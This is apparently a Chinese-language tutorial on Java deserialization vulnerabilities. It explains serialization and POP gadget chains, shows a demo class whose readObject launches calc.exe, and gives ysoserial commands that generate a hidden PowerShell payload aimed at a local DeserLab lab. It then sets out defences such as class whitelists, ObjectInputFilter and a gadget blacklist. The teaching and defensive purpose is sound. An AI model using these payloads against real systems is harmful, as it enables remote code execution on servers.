Java反序列化漏洞从入门到深入<\/h1>

前言<\/h2>
Java反序列化漏洞是近年来影响范围最广、危害最大的漏洞类型之一，从2015年影响WebSphere、JBoss、Jenkins、WebLogic等大型框架的Apache Commons Collections反序列化远程命令执行漏洞，到2017年末WebLogic XML反序列化引起的挖矿风波，反序列化漏洞一直在持续影响各类Java应用。<\/p>

序列化与反序列化基础<\/h2>

什么是序列化和反序列化<\/h3>
Java序列化是将对象的状态信息转换为可以存储或传输的形式的过程，反序列化则是将序列化后的数据恢复为对象的过程。主要应用场景包括：<\/p>
对象持久化存储<\/li>
网络通信<\/li>
数据传输<\/li>
远程方法调用(RMI)<\/li> <\/ul>
序列化实现<\/h3>
一个类要实现序列化，必须满足两个条件：<\/p>
实现java.io.Serializable<\/code>接口<\/li>
所有属性必须是可序列化的，或者使用transient<\/code>关键字标记为非序列化<\/li>
<\/ol>
示例代码：<\/p>
public<\/span> class<\/span> Employee<\/span> implements<\/span> java.<\/span>io<\/span>.<\/span>Serializable<\/span> {<\/span>
<\/span><\/span>    public<\/span> String name;<\/span>
<\/span><\/span>    public<\/span> String identify;<\/span>
<\/span><\/span>    public<\/span> void<\/span> mailCheck<\/span>()<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"This is the "<\/span>+<\/span>this<\/span>.<\/span>identify<\/span>+<\/span>" of our company"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>序列化操作<\/h3>
import<\/span> java.io.*;<\/span>
<\/span><\/span>public<\/span> class<\/span> SerializeDemo<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String []<\/span> args)<\/span> {<\/span>
<\/span><\/span>        Employee e =<\/span> new<\/span> Employee();<\/span>
<\/span><\/span>        e.<\/span>name<\/span> =<\/span> "员工甲"<\/span>;<\/span>
<\/span><\/span>        e.<\/span>identify<\/span> =<\/span> "General staff"<\/span>;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            FileOutputStream fileOut =<\/span> new<\/span> FileOutputStream(<\/span>"employee1.db"<\/span>);<\/span>
<\/span><\/span>            ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>fileOut);<\/span>
<\/span><\/span>            out.<\/span>writeObject<\/span>(<\/span>e);<\/span>
<\/span><\/span>            out.<\/span>close<\/span>();<\/span>
<\/span><\/span>            fileOut.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span>(<\/span>IOException i)<\/span> {<\/span>
<\/span><\/span>            i.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>反序列化操作<\/h3>
import<\/span> java.io.*;<\/span>
<\/span><\/span>public<\/span> class<\/span> DeserializeDemo<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String []<\/span> args)<\/span> {<\/span>
<\/span><\/span>        Employee e =<\/span> null<\/span>;<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            FileInputStream fileIn =<\/span> new<\/span> FileInputStream(<\/span>"employee1.db"<\/span>);<\/span>
<\/span><\/span>            ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>fileIn);<\/span>
<\/span><\/span>            e =<\/span> (<\/span>Employee)<\/span> in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>            in.<\/span>close<\/span>();<\/span>
<\/span><\/span>            fileIn.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span>(<\/span>IOException i)<\/span> {<\/span>
<\/span><\/span>            i.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span> catch<\/span>(<\/span>ClassNotFoundException c)<\/span> {<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Employee class not found"<\/span>);<\/span>
<\/span><\/span>            c.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            return<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Deserialized Employee..."<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Name: "<\/span> +<\/span> e.<\/span>name<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"This is the "<\/span>+<\/span>e.<\/span>identify<\/span>+<\/span>" of our company"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>反序列化漏洞原理<\/h2>
基本漏洞示例<\/h3>
import<\/span> java.io.*;<\/span>
<\/span><\/span>public<\/span> class<\/span> test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String args[])<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        UnsafeClass Unsafe =<\/span> new<\/span> UnsafeClass();<\/span>
<\/span><\/span>        Unsafe.<\/span>name<\/span> =<\/span> "hacked by ph0rse"<\/span>;<\/span>
<\/span><\/span>        FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>"object"<\/span>);<\/span>
<\/span><\/span>        ObjectOutputStream os =<\/span> new<\/span> ObjectOutputStream(<\/span>fos);<\/span>
<\/span><\/span>        os.<\/span>writeObject<\/span>(<\/span>Unsafe);<\/span>
<\/span><\/span>        os.<\/span>close<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        FileInputStream fis =<\/span> new<\/span> FileInputStream(<\/span>"object"<\/span>);<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>fis);<\/span>
<\/span><\/span>        UnsafeClass objectFromDisk =<\/span> (<\/span>UnsafeClass)<\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>objectFromDisk.<\/span>name<\/span>);<\/span>
<\/span><\/span>        ois.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>class<\/span> UnsafeClass<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    public<\/span> String name;<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> in)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        in.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span> \/\/ 漏洞点
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞起源<\/h3>


开发失误<\/strong>：<\/p>

重写ObjectInputStream<\/code>的resolveClass<\/code>方法中的检测可被绕过<\/li>
使用第三方类进行黑名单控制不完善<\/li>
<\/ul>
<\/li>

基础库中的隐藏漏洞<\/strong>：<\/p>

常见危险基础库包括：

commons-fileupload 1.3.1<\/li>
commons-io 2.4<\/li>
commons-collections 3.1<\/li>
commons-logging 1.2<\/li>
commons-beanutils 1.9.2<\/li>
org.slf4j:slf4j-api 1.7.21<\/li>
com.mchange:mchange-commons-java 0.2.11<\/li>
org.apache.commons:commons-collections 4.0<\/li>
com.mchange:c3p0 0.9.5.2<\/li>
org.beanshell:bsh 2.0b5<\/li>
org.codehaus.groovy:groovy 2.3.9<\/li>
org.springframework:spring-aop 4.1.4.RELEASE<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
POP Gadgets<\/h3>
POP(Property-Oriented Programming)面向属性编程，类似于二进制利用中的ROP(Return-Oriented Programming)。POP Gadgets是指通过一系列对象属性调用链实现攻击的代码片段。<\/p>
如何发现Java反序列化漏洞<\/h2>
白盒检测<\/h3>


查找反序列化函数调用点：<\/p>

ObjectInputStream.readObject<\/code><\/li>
ObjectInputStream.readUnshared<\/code><\/li>
XMLDecoder.readObject<\/code><\/li>
Yaml.load<\/code><\/li>
XStream.fromXML<\/code><\/li>
ObjectMapper.readValue<\/code><\/li>
JSON.parseObject<\/code><\/li>
<\/ul>
<\/li>

检查Class Path中是否包含危险库<\/p>
<\/li>

检查命令执行相关代码区域<\/p>
<\/li>
<\/ol>
黑盒检测<\/h3>


识别序列化数据特征：<\/p>

通常以AC ED 00 05<\/code>开头<\/li>
常见数据类型标识：

0x70<\/code> - TC_NULL<\/li>
0x71<\/code> - TC_REFERENCE<\/li>
0x72<\/code> - TC_CLASSDESC<\/li>
0x73<\/code> - TC_OBJECT<\/li>
0x74<\/code> - TC_STRING<\/li>
0x75<\/code> - TC_ARRAY<\/li>
0x76<\/code> - TC_CLASS<\/li>
0x7B<\/code> - TC_EXCEPTION<\/li>
0x7C<\/code> - TC_LONGSTRING<\/li>
0x7D<\/code> - TC_PROXYCLASSDESC<\/li>
0x7E<\/code> - TC_ENUM<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

使用工具分析：<\/p>

SerializationDumper：解析序列化数据<\/li>
<\/ul>
java -jar SerializationDumper-v1.0.jar aced000573720008456d706c6f796565eae11e5afcd287c50200024c00086964656e746966797400124c6a6176612f6c616e672f537472696e673b4c00046e616d6571007e0001787074000d47656e6572616c207374616666740009e59198e5b7a5e794b2
<\/span><\/span><\/code><\/pre>
ysoserial：生成攻击payload<\/li>
<\/ul>
java -jar ysoserial.jar CommonsCollections1 'curl " + URL + "'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
环境测试示例<\/h2>
使用DeserLab模拟环境：<\/p>

生成payload：<\/li>
<\/ol>
java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc bQBrAGQAaQByACAAaABhAGMAawBlAGQAXwBiAHkAXwBwAGgAMAByAHMAZQA="<\/span> > payload2.bin
<\/span><\/span><\/code><\/pre>
启动服务端：<\/li>
<\/ol>
java -jar DeserLab.jar -server 127.0.0.1 6666<\/span>
<\/span><\/span><\/code><\/pre>
使用exploit脚本攻击：<\/li>
<\/ol>
python deserlab_exploit.py 127.0.0.1 6666<\/span> payload2.bin
<\/span><\/span><\/code><\/pre>反序列化漏洞修复<\/h2>
1. 使用SerialKiller替换ObjectInputStream<\/h3>
\/\/ 使用SerialKiller替换ObjectInputStream
<\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> SerialKiller(<\/span>fis,<\/span> "\/etc\/serialkiller.conf"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>2. 重写resolveClass方法<\/h3>
public<\/span> class<\/span> AntObjectInputStream<\/span> extends<\/span> ObjectInputStream {<\/span>
<\/span><\/span>    public<\/span> AntObjectInputStream<\/span>(<\/span>InputStream inputStream)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        super<\/span>(<\/span>inputStream);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> resolveClass(<\/span>ObjectStreamClass desc)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        if<\/span> (!<\/span>desc.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>SerialObject.<\/span>class<\/span>.<\/span>getName<\/span>()))<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> InvalidClassException(<\/span>"Unauthorized deserialization attempt"<\/span>,<\/span> desc.<\/span>getName<\/span>());<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>resolveClass<\/span>(<\/span>desc);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 使用ValidatingObjectInputStream<\/h3>
private<\/span> static<\/span> Object deserialize<\/span>(<\/span>byte<\/span>[]<\/span> buffer)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    Object obj;<\/span>
<\/span><\/span>    ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>buffer);<\/span>
<\/span><\/span>    ValidatingObjectInputStream ois =<\/span> new<\/span> ValidatingObjectInputStream(<\/span>bais);<\/span>
<\/span><\/span>    ois.<\/span>accept<\/span>(<\/span>SerialObject.<\/span>class<\/span>);<\/span> \/\/ 白名单控制
<\/span><\/span><\/span><\/span>    obj =<\/span> ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    return<\/span> obj;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 使用contrast-rO0<\/h3>
SafeObjectInputStream in =<\/span> new<\/span> SafeObjectInputStream(<\/span>inputStream,<\/span> true<\/span>);<\/span>
<\/span><\/span>in.<\/span>addToWhitelist<\/span>(<\/span>SerialObject.<\/span>class<\/span>);<\/span>
<\/span><\/span>in.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>5. Java 9+使用ObjectInputFilter<\/h3>
class<\/span> BikeFilter<\/span> implements<\/span> ObjectInputFilter {<\/span>
<\/span><\/span>    private<\/span> long<\/span> maxStreamBytes =<\/span> 78<\/span>;<\/span>
<\/span><\/span>    private<\/span> long<\/span> maxDepth =<\/span> 1<\/span>;<\/span>
<\/span><\/span>    private<\/span> long<\/span> maxReferences =<\/span> 1<\/span>;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> Status checkInput<\/span>(<\/span>FilterInfo filterInfo)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>filterInfo.<\/span>references<\/span>()<\/span> <<\/span> 0<\/span> ||<\/span> 
<\/span><\/span>            filterInfo.<\/span>depth<\/span>()<\/span> <<\/span> 0<\/span> ||<\/span> 
<\/span><\/span>            filterInfo.<\/span>streamBytes<\/span>()<\/span> <<\/span> 0<\/span> ||<\/span> 
<\/span><\/span>            filterInfo.<\/span>references<\/span>()<\/span> ><\/span> maxReferences ||<\/span> 
<\/span><\/span>            filterInfo.<\/span>depth<\/span>()<\/span> ><\/span> maxDepth ||<\/span>
<\/span><\/span>            filterInfo.<\/span>streamBytes<\/span>()<\/span> ><\/span> maxStreamBytes)<\/span> {<\/span>
<\/span><\/span>            return<\/span> Status.<\/span>REJECTED<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        Class<?><\/span> clazz =<\/span> filterInfo.<\/span>serialClass<\/span>();<\/span>
<\/span><\/span>        if<\/span> (<\/span>clazz !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>SerialObject.<\/span>class<\/span> ==<\/span> filterInfo.<\/span>serialClass<\/span>())<\/span> {<\/span>
<\/span><\/span>                return<\/span> Status.<\/span>ALLOWED<\/span>;<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                return<\/span> Status.<\/span>REJECTED<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> Status.<\/span>UNDECIDED<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. 禁止执行外部命令<\/h3>
SecurityManager originalSecurityManager =<\/span> System.<\/span>getSecurityManager<\/span>();<\/span>
<\/span><\/span>if<\/span> (<\/span>originalSecurityManager ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>    SecurityManager sm =<\/span> new<\/span> SecurityManager()<\/span> {<\/span>
<\/span><\/span>        private<\/span> void<\/span> check<\/span>(<\/span>Permission perm)<\/span> {<\/span>
<\/span><\/span>            \/\/ 禁止exec
<\/span><\/span><\/span><\/span>            if<\/span> (<\/span>perm instanceof<\/span> java.<\/span>io<\/span>.<\/span>FilePermission<\/span>)<\/span> {<\/span>
<\/span><\/span>                String actions =<\/span> perm.<\/span>getActions<\/span>();<\/span>
<\/span><\/span>                if<\/span> (<\/span>actions !=<\/span> null<\/span> &&<\/span> actions.<\/span>contains<\/span>(<\/span>"execute"<\/span>))<\/span> {<\/span>
<\/span><\/span>                    throw<\/span> new<\/span> SecurityException(<\/span>"execute denied!"<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            \/\/ 禁止设置新的SecurityManager
<\/span><\/span><\/span><\/span>            if<\/span> (<\/span>perm instanceof<\/span> java.<\/span>lang<\/span>.<\/span>RuntimePermission<\/span>)<\/span> {<\/span>
<\/span><\/span>                String name =<\/span> perm.<\/span>getName<\/span>();<\/span>
<\/span><\/span>                if<\/span> (<\/span>name !=<\/span> null<\/span> &&<\/span> name.<\/span>contains<\/span>(<\/span>"setSecurityManager"<\/span>))<\/span> {<\/span>
<\/span><\/span>                    throw<\/span> new<\/span> SecurityException(<\/span>"System.setSecurityManager denied!"<\/span>);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> void<\/span> checkPermission<\/span>(<\/span>Permission perm)<\/span> {<\/span>
<\/span><\/span>            check(<\/span>perm);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> void<\/span> checkPermission<\/span>(<\/span>Permission perm,<\/span> Object context)<\/span> {<\/span>
<\/span><\/span>            check(<\/span>perm);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    };<\/span>
<\/span><\/span>    System.<\/span>setSecurityManager<\/span>(<\/span>sm);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7. 黑名单方式(不推荐)<\/h3>
\/\/ 常见危险类黑名单
<\/span><\/span><\/span><\/span>private<\/span> static<\/span> final<\/span> String[]<\/span> blacklist =<\/span> {<\/span>
<\/span><\/span>    "org.apache.commons.collections.functors.InvokerTransformer"<\/span>,<\/span>
<\/span><\/span>    "org.apache.commons.collections.functors.InstantiateTransformer"<\/span>,<\/span>
<\/span><\/span>    "org.apache.commons.collections4.functors.InvokerTransformer"<\/span>,<\/span>
<\/span><\/span>    "org.apache.commons.collections4.functors.InstantiateTransformer"<\/span>,<\/span>
<\/span><\/span>    "org.codehaus.groovy.runtime.ConvertedClosure"<\/span>,<\/span>
<\/span><\/span>    "org.codehaus.groovy.runtime.MethodClosure"<\/span>,<\/span>
<\/span><\/span>    "org.springframework.beans.factory.ObjectFactory"<\/span>,<\/span>
<\/span><\/span>    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,<\/span>
<\/span><\/span>    "org.apache.commons.fileupload"<\/span>,<\/span>
<\/span><\/span>    "org.apache.commons.beanutils"<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>总结<\/h2>
Java反序列化漏洞影响范围广泛，从Web服务到安卓应用、桌面应用、中间件、工控组件等都可能存在此类漏洞。防御反序列化漏洞的关键在于：<\/p>

严格控制反序列化操作的输入源<\/li>
使用白名单机制限制可反序列化的类<\/li>
及时更新基础库到安全版本<\/li>
避免直接反序列化不可信数据<\/li>
<\/ol>
在实际开发和安全防护中，应优先考虑使用白名单机制，而非黑名单机制，因为黑名单难以覆盖所有可能的攻击向量。<\/p>
Java反序列化漏洞从入门到深入<\/h1>

序列化与反序列化基础<\/h2>

反序列化漏洞原理<\/h2>

POP Gadgets<\/h3> POP(Property-Oriented Programming)面向属性编程，类似于二进制利用中的ROP(Return-Oriented Programming)。POP Gadgets是指通过一系列对象属性调用链实现攻击的代码片段。<\/p>

如何发现Java反序列化漏洞<\/h2>

反序列化漏洞修复<\/h2>

POP Gadgets<\/h3>
POP(Property-Oriented Programming)面向属性编程，类似于二进制利用中的ROP(Return-Oriented Programming)。POP Gadgets是指通过一系列对象属性调用链实现攻击的代码片段。<\/p>
